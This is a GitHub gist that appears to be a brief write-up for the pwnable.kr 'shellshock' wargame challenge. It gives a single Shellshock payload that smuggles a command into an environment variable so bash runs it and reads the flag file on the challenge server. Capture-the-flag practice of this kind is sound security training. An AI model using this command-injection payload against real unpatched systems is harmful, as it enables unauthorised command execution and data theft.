Skip to content

Instantly share code, notes, and snippets.

@parksjin01
Last active March 16, 2017 20:51
Show Gist options
  • Save parksjin01/f14883dec95b9652c9c112181fe601f6 to your computer and use it in GitHub Desktop.
Save parksjin01/f14883dec95b9652c9c112181fe601f6 to your computer and use it in GitHub Desktop.
pwnable.kr shellshock writeup
env x='() { :;}; /bin/cat flag' ./shellshock

It should be executed in ssh shellshock@pwnable.kr -p 2222 not in your computer

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment